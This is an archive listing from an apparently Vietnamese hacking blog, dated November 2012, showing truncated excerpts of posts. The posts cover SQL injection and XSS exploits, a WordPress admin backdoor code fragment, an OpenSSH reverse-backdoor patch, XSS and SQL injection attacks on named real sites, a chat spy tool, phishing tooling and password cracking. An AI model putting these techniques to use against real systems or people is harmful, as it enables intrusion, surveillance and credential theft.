# Exploit Title: Yii Framework - Search SQL Injection Vulnerability # Google Dork: No Dork # Date: 20/11/2012 # Exploit Author: Juno_okyo # ...
Tuesday, November 20, 2012
Monday, November 19, 2012
WordPress WP E-Commerce 3.8.9 SQL Injection / Cross Site Scripting
WordPress WP E-Commerce 3.8.9 SQL Injection / Cross Site Scripting Software: WP e-Commerce Software Language: PHP Version: 3.8.9 and below V...
Wordpress Plugins Spotlight Your Upload Vulnerability
___________.__ _________ _________ \__ ___/| |__ ____ \_ ___ \______ ...
Media Player Classic XSS / Denial Of Service
========================================================================================== MPC (Media Player Classic) WebServer Multiple Vul...
Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasp...
IMMonitor Yahoo Messenger Spy v2.2.9.(Full)
IMMonitor Yahoo Messenger Spy cho phép bạn theo dõi, khoá lại hoặc ghi lại các đoạn đối thoại chat trên Yahoo Messenger từ xa. Nếu con cái...
SQL Injection - Useful Functions - Tutorial
Here are some useful function that you can use to speed up your injection and/or evade some WAFs. If group_concat() or concat() are not avai...
Exploiting Java Applet JAX-WS Remote Code Execution
Recientemente se ha publicado una nueva vulnerabilidad en Java, denominada Java Applet JAX-WS Remote Code Execution descubierta por @_jua...
![[XSS] Soha.vn](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY_tT0Y2ggQEaK_TGdX0H7AemOoayqMM3NOcJQY4KBYcdB7SRT1muVMP5Fh6k6LmdX0sC4xYvoVL248kJUBUwAkeC8ONuSu9HW41wgZtlScP5W7uTSbpwJef4Zximj8sUywtCI6mWQW7z7/s72-c/soha.vn.png)
[XSS] Soha.vn
Site: http://my.soha.vn Exploit: Cross Site Scripting (XSS) Stored. Đánh giá: Nghiêm trọng. Khai thác: Inject Script red irec t , steal co...
vBulletin vBay <=1.1.9 Error-Based SQL Injection
#!/usr/bin/env python -W ignore::DeprecationWarning """ VBay <= 1.1.9 - Remote Error based SQL Injection ...
Tội phạm lừa đảo - Phần VI: Đánh cắp nhận dạng
Bạn làm việc chăm chỉ cần mẫn hàng ngày chỉ với mong muốn kiếm sống nuôi lấy bản thân. Bạn phải hết sức dè sẻn trong chi tiêu hàng ngày, và...
Tội phạm lừa đảo - Phần V: Rửa tiền (Phần tiếp theo)
Rửa tiền tham ô: Eddie Antar Vào thập kỉ 80, Eddie Antar, chủ sở hữu của Crazy Eddie’s Electronics, đã lấy đi hàng triệu dollar của công ...
Tội phạm lừa đảo - Phần V: Rửa tiền
Tháng 10 năm 2005, Nghị sĩ Tom Delay của Mỹ bị buộc tội có liên quan tới một vụ án rửa tiền và rồi bị giáng chức xuống thành House Majorit...
Sunday, November 18, 2012
Thay đổi User Agent mặc định của Firefox
1. Open file: C:\Documents and Settings\username\Application Data\Mozilla\Firefox\Profiles\3vfugy1g.default\prefs.js 2. Add the following li...
[TUT] Back connect không cần Port Forwarding
Video Tutorial + Code + TXT hướng dẫn đều trong file RAR: Download: http://www.mediafire.com/?y9jhabsywx4d38h Pass Unlock: (Only Juno_okyo...
Facebook sửa lỗi bypass Password
Facebook vừa sửa lỗ hổng bảo mật vào cuối tuần qua và cho rằng nó có thể bị khai thác và có thể có trên 1 triệu tài khoản sẽ bị đăng nhập ...
Brute, Crack password với Hashcat
Juno_okyo đã từng post 1 tools tương tự tại đây (OclHashcat): http://junookyo.blogspot.com/2012/05/oclhashcat-plus-v008-released-fastest.htm...
Share tài liệu chuyên ngành Mạng - IT
I/ Giới thiệu: Bộ tài liệu cung cấp các kiến thức cơ bản nhất về chuyên ngành mạng, tuy chưa đủ hết, nhưng nó sẽ cung cấp cho các bạn 1 lượ...
Saturday, November 17, 2012
![[VLTK] Tân Kiếm Hiệp ver2.0 full, ko giới hạn](https://lh5.googleusercontent.com/-MeuCQWn5z1A/UKWaoZGSPGI/AAAAAAAAANk/nHiOOqjsCFk/s72-c/Maze-GameVN.Com-tkh1.jpg)
[VLTK] Tân Kiếm Hiệp ver2.0 full, ko giới hạn
Server Võ lâm truyền kỳ Tân Kiếm Hiệp ver2.0 full, ko giới hạn Sv no font Thông tin server: + Vòng Sáng Hoàng Kim + Việt Hóa Có Dấu + Lên Xu...
![[VLTK]Server Best Friend Forever - BFF](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju2MU5K526UJcInFW18MOzDauDCq6XTAvO-Nxd9-vfouSd3h8TeS-OFr8xuIE3J1ys0LcwPOlCZgrmkqKQDmrXGA1418FpGeRKO9OjMcdAQd3wVJWU1VVsd3C0K3mlppf1M94hNNA0C9M_/s72-c/f87c3f8adb2c6e2ea37928ca3b2d2996_50058218.bff1.bmp)
[VLTK]Server Best Friend Forever - BFF
Server Võ lâm truyền kỳ - Best Friend Forever - BFF trên máy ảo + Lên xuống ngựa = phím "M". + Hút hít( Ngoại công). + Hiển thị ti...
Friday, November 16, 2012
Mod gather infomation victim khi đã có session (MSF)
Khi đã tạo được session trên máy victim nhưng lại muốn lấy 1 số thông tin nơi địa phương như lịch sử các ổ usb, list wifi nạn nhân đang ho...
WordPress Admin Access Backdoor
<?php add_action('wp_head', 'my_backdoor'); function my_backdoor() { If ($_GET['backdoor'] == 'go') { req...
Auto Rooting Script
Yes can someone upload autoroot.sh 2012 i have another working autoroot.pl here if anyone wants it READ MORE »
Cross-site Scripting Vulnerability in WordPress GD Star Rating Plugin
Vector: Remote Severity: Low Patch: Unpatched Impact: Cross-site Scripting (XSS) Softw...
OpenSSH 6.0p1 Backdoor Patch 1.2
############### # $id: udc-hackssh-v3_bajaulaut-v1, 2012/10/28 05:00:50 slash rootkit # udc-hackssh_bajaulaut - openssh reverse backdoor # c...
Biggest wordpress Exploit Library
Biggest wordpress Exploit Library: READ MORE »
WordPress Version Checker - MD5 Hash Method
WordPress Version Check provides you with an easy way of checking that which version your Victim is using. It is a simple php Script based ...
Phemail.py: Phishing EMail Social Engineering Tool
Social Engineering is defined as the process of inducing people into giving away access or confidential information. From a security consu...
Thursday, November 15, 2012
[XSS] Exploit Google for Phishing attack
Lần trước khi Juno_okyo gửi email cảnh báo về XSS tại Google Transplate, phía Security của Google đã rep lại và không hề quan tâm đến exploi...
Kỹ thuật Network Address Translation (NAT)
Hầu hết những người sở hữu một kết nối Internet hiện đại ngày nay đều phải sử dụng đến kỹ thuật NAT (Network Address Translation) . NAT đã...
Wednesday, November 14, 2012
[Check] Mangtoancau.vn
Site: https://diendan.mangtoancau.vn/forum.php Exploit: SQL Injection Đánh giá: Nghiêm trọng Khai thác: Truy vấn SQL lấy thông tin => C...
USB Booting for Windows, Linux, and others
Thấy nhiều bạn vẫn còn lăn tăn trong việc chọn chương trình để tạo Bootable USB đúng cách và hiệu quả, nên topic này mình sẽ tổng hợp các ...
Tuesday, November 13, 2012
Fierce Domain Scan
Written by RSnake with input from id , Vacuum and Robert E Lee . A special thanks to IceShaman to porting it to use multi-threading. Fie...
PHP - Những điều có thể bạn chưa biết
Thủ thuật khi lập trình PHP 1- Khi echo thay thế print: Echo luôn luôn hoạt động nhanh hơn print, vì echo không có return gì cả, trong khi p...
Test member - Kĩ năng tư duy
Bài test được đưa ra: Thực hiện quay 1 clip (video) vượt War Game. URL: http://poly-edu.in/war-game/ Level: vượt được bao nhiêu level thì qu...
Monday, November 12, 2012
vBulletin 3.0 Private Message HTML Injection Vulnerability
source: http://www.securityfocus.com/bid/7594/info A vulnerability has been reported in vBulletin 3.0.0 beta 2. The problem is said to occ...
How to Deface GhostClub.Info - Just for fun :))
Chủ yếu là test cái Intro mới =)) Just for fun :)) M ở tab m ới x em HD 7 20 p nh é :))
Sunday, November 11, 2012
Vài mẫu UI Login mới design (CrossFire)
http://www.mediafire.com/?0l465yy3rbl5wrw http://www.mediafire.com/?512n7ufplc18iz2 (Chưa Upload)
Devil May Cry - UI Login CrossFire
Download: http://www.mediafire.com/?1thbk43dbc16k1k
6 cách nhanh chóng chia sẻ tập tin đến nhiều người
Khi nhắc đến vấn đề chia sẻ các tập tin trên Internet, có lẽ hầu hết mọi người đều sẽ nghĩ đến việc sử dụng dịch vụ lưu trữ đám mây phổ bi...
Subscribe to:
Posts (Atom)